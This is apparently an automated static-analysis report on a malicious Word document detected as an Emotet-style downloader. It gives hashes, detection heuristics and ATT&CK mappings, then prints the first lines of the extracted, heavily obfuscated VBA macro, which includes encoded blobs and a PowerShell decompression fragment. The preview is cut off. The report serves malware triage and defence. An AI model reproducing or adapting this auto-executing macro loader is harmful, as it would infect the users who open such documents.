Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 529b401615e32560…

MALICIOUS

Office (OLE)

Size: 157.5 KB
Created: 2018-04-04 12:10:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: 72ef8b050aec2f104d0dd22dfa5e2a49
SHA-1: c1be8e46be059e081f76926159364d497d17301d
SHA-256: 529b401615e325605ee854c39b107daac46d423b630c0f521d4bb0384681892e
Risk Score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but appears designed to download and execute a second-stage payload, as indicated by the CreateObject call and the presence of a long encoded blob. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports the malicious verdict. Because the macro is written in VBA, the sample maps to T1059.005.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46549 bytes
SHA-256: 5290e0c6df65a9c6c63fec4cfb835e5357306c561551114634e6a8d51523aacb
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 13 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rIXpwWNrWaszR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zAjclPaXiwkzu"
Function SWauqtbXEYC()
On Error Resume Next
Select Case HzwjHG
         Case 96503

            nVRUaU = 77103
            ETZCAG = Sqr(32686)
         Case 30823

            dXTWPz = CSng(Eshrip)
            TMUOO = HPQiR
End Select
ivWUdpOGs = hblGa("nMmY4KPqX707w791/') , [sYstEm.Io.cOmPRESsION.ComPRESsioNMOdE]::decOMPRESS ) ), [text.eNcOdiNG]::aSCiI) ).ReAdtOEnD( ) QuDRA", 3, 116)
Select Case GNbmBi
         Case 66396

            djiIYY = 49271
            inwNP = Sqr(14848)
         Case 11609

            jsCtbO = CSng(oEard)
            GfJwsi = hMpqwr
End Select
Select Case KJzFOS
         Case 19930

            BwidH = 24117
            ATjRN = Sqr(28096)
         Case 17021

            mmHHG = CSng(VaLcjj)
            CTXJcv = uGDrW
End Select
UsmdvB = hblGa("r0UU/FSxwEj/eIujm+vF689Rl", 3, 19)
Select Case vUqcOX
         Case 3664

            MTGKEP = 62151
            SAXdk = Sqr(95786)
         Case 99897

            IlSqV = CSng(iPkQAA)
            iOMhjq = RwXjmZ
End Select
Select Case AfVAD
         Case 49987

            zlTkdU = 95660
            pNnsI = Sqr(25980)
         Case 20226

            DWpOi = CSng(IjpJG)
            IhREX = rjQam
End Select
VhIdmV = hblGa("PaFBkrDtjGRhigPu6x3IOAkcpxvDPp+/Papqh5bUYSG@4DD", 5, 38)
Select Case JUztHq
         Case 36211

            pKSdOL = 12765
            dnvTNr = Sqr(235)
         Case 15619

            iUuVbE = CSng(kqEOYP)
            zqIQz = nqMHQ
End Select
Select Case RLYaJ
         Case 37838

            YDWqd = 25160
            cZwdm = Sqr(55644)
         Case 36314

            fJHOi = CSng(BkSvv)
            RiHPIc = IJPjQQ
End Select
POKDVP = hblGa(".7tJ,B+sTV75+Kd6uHTdb1N3x7PjCPs5Lj2OtcyPxwDilB/w8vbZ6/qHDLeMeCgcj8sPjCeJx7fXdveDR8cFzoY/Il3UgrsDPg9ZDb9DHMXB+UJw9z5O4AA760o+DWht", 7, 119)
Select Case zsXTjT
         Case 92598

            fPSvlv = 45520
            DviNz = Sqr(95544)
         Case 34218

            UKCKJP = CSng(rzHTIN)
            ObDSzs = MrfkqL
End Select
Select Case wsCPUO
         Case 88133

            SEhzo = 68073
            dPjPJ = Sqr(78908)
         Case 28787

            EXKEK = CSng(uoCBP)
            zwnjsw = cGqOGh
End Select
vzhARl = hblGa("FMdI/KfpN9Ep9q8DXr31q+qhJvK8ZPPT6yjqwz+7vWXK7E+yCdq5kP60bdi/SjnKt5LmRdiC8+CvjN8zOSnxP4zqPyGKov8KfBiDfovvfNONfyPKS/qsR3E08qzYfpy2uT/Y/zakr/S5050CeyD6w/eHuQrh+k671Onyi2tb", 4, 161)
Select Case XtATw
         Case 98636

            mzrKJj = 84817
            QivYF = Sqr(3122)
         Case 63383

            AXMqmA = CSng(JDWIp)
            njFQv = zwViN
End Select
Select Case CnpHU
         Case 3559

            MQQQt = 23382
            zzlOwc = Sqr(89551)
         Case 82376

            Sjkhkz = CSng(YcDSBw)
            IIXIA = WFNYuR
End Select
rzVSzJmfc = hblGa("D5Chdr6gPuobcOp98fdT3wfxd3xBXJXijv7+wP6qztHjiN0+zBv8GQiXI8+jFn6C49frZMxn1VAPGF/Q+0rfixfE+0g60fN1c/CkFh+Aw41wLn4T3+AjnWdbc", 3, 115)
Select Case vbpPZL
         Case 83583

            bjUYM = 62972
            nqtdBa = Sqr(54968)
         Case 12992

            UuwYN = CSng(MnSVo)
            nntpEA = YCjnLf
End Select
Select Case MKjVhA
         Case 14264

            UHcdA = 89651
            owqihr = Sqr(4258)
         Case 24575

            OKLZWw = CSng(qJvQK)
            BFsDMF = lhqPW
End Select
EPFiPnYO = hblGa("Bhwrgs2a6+82riyte7Cbxubx+qN/ftfa0f6o7M9oV3bT+udfbFxb3drIxlObtdc7G5utorU2ibZqbGDjaMGfS+tmrfXwGtO+k/RcY882wXNbP28WrbTxzoKl/SaV758+X/p+Q183t7Rfeg3xeuOfp+c2Nlmm832/yPP93Mg4Zr4pi@NcN", 4, 168)
Select Case YbzcsJ
         Case 95286

            HWpio = 45468
            mUEiXu = Sqr(92785)
         Case 70240

            ifwvpj
... (truncated)